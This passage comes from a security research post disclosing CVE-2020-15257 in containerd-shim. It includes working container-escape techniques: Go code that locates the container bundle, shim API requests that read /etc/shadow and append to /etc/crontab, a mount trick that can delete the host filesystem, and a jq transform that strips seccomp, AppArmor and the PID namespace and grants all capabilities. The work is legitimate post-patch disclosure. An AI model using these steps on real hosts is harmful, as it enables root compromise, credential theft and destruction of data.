12:cpuset:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
11:pids:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
10:devices:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
9:cpu,cpuacct:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
8:net_cls,net_prio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
7:blkio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
6:freezer:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
5:hugetlb:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
4:perf_event:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
3:rdma:/
2:memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
1:name=systemd:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
0::/system.slice/containerd.service
Note: The config.json file within the bundle directory will contain
the host path to the container’s root filesystem.
The second, which I only learned would be possible after I had written an
exploit based on the first method, is to create a runc bundle configuration
within your own container’s filesystem; the base path for your container’s
filesystem on the host is available from the /etc/mtab file mounted into the
container (thanks @drraid/@0x7674).
# head -n 1 /etc/mtab
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/165536.165536/overlay2/l/EVYWL6E5PMDAS76BQVNOMGHLCA:/var/lib/docker/165536.165536/overlay2/l/WGXNHNVFLLGUXW7AWYAHAZJ3OJ:/var/lib/docker/165536.165536/overlay2/l/MC6M7WQGXRBLA5TRN5FAXRE3HH:/var/lib/docker/165536.165536/overlay2/l/XRVQ7R6RZ7XZ3C3LKQSAZDMFAO:/var/lib/docker/165536.165536/overlay2/l/VC7V4VA5MA3R4Z7ZYCHK5DVETT:/var/lib/docker/165536.165536/overlay2/l/5NBSWKYN7VDADBTD3R2LJRXH3M,upperdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/diff,workdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/work,xino=off 0 0
Note: The shared base directory of the upperdir and workdir paths
contains a merged/ subdirectory that is the root of the container filesystem.
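A quick sketch of the first method, run from inside the container, pulls the ID out of /proc/self/cgroup and derives the bundle path (the io.containerd.runtime.v1.linux/moby layout shown above is assumed; a non-Docker containerd client would use a different namespace):

package main

import (
    "fmt"
    "os"
    "strings"
)

func main() {
    // On a cgroup-v1 Docker host, /proc/self/cgroup lines look like
    // "12:cpuset:/docker/<64-hex-id>", as in the output above.
    data, err := os.ReadFile("/proc/self/cgroup")
    if err != nil {
        panic(err)
    }
    for _, line := range strings.Split(string(data), "\n") {
        idx := strings.LastIndex(line, "/docker/")
        if idx == -1 {
            continue
        }
        id := line[idx+len("/docker/"):]
        // Assumed layout for Docker's use of containerd's v1 linux runtime.
        bundle := "/run/containerd/io.containerd.runtime.v1.linux/moby/" + id
        fmt.Println("container id:", id)
        fmt.Println("bundle path: ", bundle)
        return
    }
    fmt.Println("no docker cgroup entry found")
}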
Mount Shenanigans (1.2.x)
So, what can we do with this? Well, with the containerd ID for our host network
namespace container, we can re-Create() it from its existing config. In this
situation, an interesting divergence between containerd 1.2.x and 1.3.x
mentioned above is that we can’t pass mounts in for containerd 1.3.x via an
RPC field; however, we can do so with containerd 1.2.x. When mounts are supplied
via RPC fields, they are essentially passed directly to mount(2) without
validation; the only limitation is that the target is always the
/run/containerd/io.containerd.runtime.v1.linux/moby/<id>/rootfs directory.
Additionally, these mount(2)s are performed before any others used to build
the container from the container image. However, it should be noted that
standard Docker containers do not actually use the rootfs directory directly
and are instead based out of directories such as
/var/lib/docker/overlay2/<id>/merged. Due to this, we cannot simply bind
mount(1) "/" to rootfs and expect that a reduced directory image (i.e.
one without /bin) would be able to access the host filesystem. However, we
can perform such a mount(2) and then bind mount(2) additional directories
over that. The end result is that the subsequent binds are then applied to the
host / directory itself through the mount from rootfs. However, this is an
extremely dangerous operation as containerd(-shim)’s final act of running
runc delete will cause the entire rootfs directory to be recursively
removed. As this would now point to / on the host, this would result in the
deletion of the entire filesystem. But if you would not heed the author’s
dire warning, the following snippets may be used to test the issue:
# mkdir -p /tmp/fakeroot/{etc,proc}
# echo "foo" > /tmp/fakeroot/etc/foo
# mkdir -p /tmp/overmount/etc
# echo "bar" > /tmp/overmount/etc/bar
_, err = c.Create(ctx, &shimapi.CreateTaskRequest{
    ID:       taskId,
    Bundle:   bundle,
    Terminal: false,
    Stdin:    "/dev/null",
    Stdout:   "/dev/null",
    Stderr:   "/dev/null",
    Rootfs: []*types.Mount{
        {
            Type:   "none",
            Source: "/tmp/fakeroot",
            Options: []string{
                "rw", "bind",
            },
        },
        {
            Type:   "none",
            Source: "/tmp/overmount",
            Options: []string{
                "rw", "bind",
            },
        },
    },
})
IO Shenanigans
Going back to containerd-shim’s IO handling, we have a pretty clear arbitrary
file read capability from pointing Stdin to any file we choose. We also have
an arbitrary file write with containerd-shim’s file:// URI support in
1.3.x, and an arbitrary file append in both versions. Given the append-only
restriction, any append modifications to our own config.json are essentially
ignored. Instead, a good target in general is /etc/crontab if the host is
running cron. All you have to do is point Stdout or Stderr at it and then
have your malicious container output a crontab line.
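As a sketch, reusing the shim client setup from the earlier connector example (taskId and bundle are placeholders, e.g. derived as described in “Finding Yourself” above; on 1.2.x the stdout target must already exist), the stdio wiring for such a request might look like:

// Arbitrary file read: the chosen Stdin path is read by containerd-shim as
// root on the host and fed to the task's stdin.
// Arbitrary file append: anything the task writes to stdout/stderr lands in
// /etc/crontab (on 1.3.x, a "file://" URI could also create the target file).
_, err = c.Create(ctx, &shimapi.CreateTaskRequest{
    ID:       taskId,
    Bundle:   bundle,
    Terminal: false,
    Stdin:    "/etc/shadow",
    Stdout:   "/etc/crontab",
    Stderr:   "/etc/crontab",
})
if err != nil {
    fmt.Printf("err: %s\n", err)
    return
}
// Start() kicks off the configured task, at which point the IO is opened.
_, err = c.Start(ctx, &shimapi.StartRequest{ID: taskId})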
Evil Containers
Given that we can, on containerd 1.3.x, overwrite our own container’s
config.json and create a new container from it, or load a custom
config.json from our own container’s filesystem, what can we do to run a
highly privileged container? First, we should talk about what this
config.json file actually is. It’s an OCI runtime config file13 that
is technically supported by several implementations.
From a privilege escalation perspective, the relevant fields are
process.capabilities.(bounding,effective,inheritable,permitted),
process.(apparmorProfile,selinuxLabel), mounts, linux.namespaces, and
linux.seccomp. From an operational perspective, root.path and
process.(args,env) are the important ones, with root.path being the most
important for us: since it sets the root of the container filesystem from the
perspective of the host, we will need to make sure it points somewhere useful
(i.e. if we plan to run something from an image). If
“re-using” an existing container’s config.json, such as our own, root.path
can be left untouched; but if loading one from our own container, root.path
would need to be patched up to reference somewhere in our container’s
filesystem. As part of my exploit that overwrites my container’s config.json
file, I use jq to transform its contents (obtained via Stdin) to:
- Remove PID namespacing
- Disable AppArmor (by setting it to “unconfined”)
- Disable Seccomp
- Add all capabilities
jq '. | del(.linux.seccomp) | del(.linux.namespaces[3]) | (.process.apparmorProfile="unconfined")
| (.process.capabilities.bounding=["CAP_CHOWN","CAP_DAC_OVERRIDE","CAP_DAC_READ_SEARCH",
"CAP_FOWNER","CAP_FSETID","CAP_KILL","CAP_SETGID","CAP_SETUID","CAP_SETPCAP",
"CAP_LINUX_IMMUTABLE","CAP_NET_BIND_SERVICE","CAP_NET_BROADCAST","CAP_NET_ADMIN",
"CAP_NET_RAW","CAP_IPC_LOCK","CAP_IPC_OWNER","CAP_SYS_MODULE","CAP_SYS_RAWIO",
"CAP_SYS_CHROOT","CAP_SYS_PTRACE","CAP_SYS_PACCT","CAP_SYS_ADMIN","CAP_SYS_BOOT",
"CAP_SYS_NICE","CAP_SYS_RESOURCE","CAP_SYS_TIME","CAP_SYS_TTY_CONFIG","CAP_MKNOD",
"CAP_LEASE","CAP_AUDIT_WRITE","CAP_AUDIT_CONTROL","CAP_SETFCAP","CAP_MAC_OVERRIDE",
"CAP_MAC_ADMIN","CAP_SYSLOG","CAP_WAKE_ALARM","CAP_BLOCK_SUSPEND","CAP_AUDIT_READ"])
| (.process.capabilities.effective=.process.capabilities.bounding)
| (.process.capabilities.inheritable=.process.capabilities.bounding)
| (.process.capabilities.permitted=.process.capabilities.bounding)'
Conclusions
- If an attacker can successfully connect to a containerd-shim socket, they can directly compromise a host. Prior to the patch for CVE-2020-15257 (fixed in containerd 1.3.9 and 1.4.3, with backport patches provided to distros for 1.2.x), host networking on Docker and Kubernetes (when using Docker or containerd CRI) was root-equivalent.
- Abstract namespace Unix domain sockets can be extremely dangerous when applied to containerized contexts (especially because containers will often share network namespaces with each other).
- It is unclear how the risks of abstract namespace sockets were not taken into account by the core infrastructure responsible for running the majority of the world’s containers. It is also unclear how this behavior went unnoticed for so long. If anything, it suggests that containerd has not undergone a proper security assessment.
- Writing exploits to abuse containerd-shim was pretty fun. Losing an entire test VM that wasn’t fully backed up due to containerd/runc not bothering to unmount everything before rm -rf-ing the supposed “rootfs” was not fun.
Technical Advisory
Our full technical advisory for this issue is available here.14
TL;DR For Users
Assuming there are containers running on a host, the following command can be used to quickly determine if a vulnerable version of containerd is in use.
$ cat /proc/net/unix | grep 'containerd-shim' | grep '@'
If the command produces output, a vulnerable version is likely in use; avoid running host networked containers as the real root user until containerd has been updated and the containers restarted.
Code
So as not to immediately impact users who have not yet been able to update to a patched version of containerd and restart their containers, we will wait until January 11th, 2021 to publish the full exploit code demonstrating the attacks described in this post. Users should keep in mind that the content in this post is sufficient to develop a working exploit, and are implored to apply the patches (and restart their containers) immediately if they have not done so already.
Update (1/12/21): Our exploit code for this issue is now available at https://github.com/nccgroup/abstractshimmer.
1. http://alexander.holbreich.org/docker-components-explained/
2. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/client/client.go
3. https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/main_unix.go
4. https://github.com/golang/go/blob/a38a917aee626a9b9d5ce2b93964f586bf759ea0/src/syscall/syscall_linux.go#L391
5. https://github.com/nccgroup/ebpf/blob/9f3459d52729d4cd75095558a59f8f2808036e10/unixdump/unixdump/__init__.py#L77
6. https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/shim_linux.go
7. https://github.com/containerd/ttrpc/blob/v1.0.1/unixcreds_linux.go
8. https://groups.google.com/forum/message/raw?msg=comp.lang.ada/E9bNCvDQ12k/1tezW24ZxdAJ
9. https://github.com/moby/moby/blob/master/profiles/apparmor/template.go
10. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/v1/shim.proto
11. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/service.go#L117
12. https://github.com/containerd/containerd/blob/v1.3.0/pkg/process/io.go#L79
13. https://github.com/opencontainers/runtime-spec/blob/master/config.md
14. https://research.nccgroup.com/2020/11/30/technical-advisory-containerd-containerd-shim-api-exposed-to-host-network-containers-cve-2020-15257/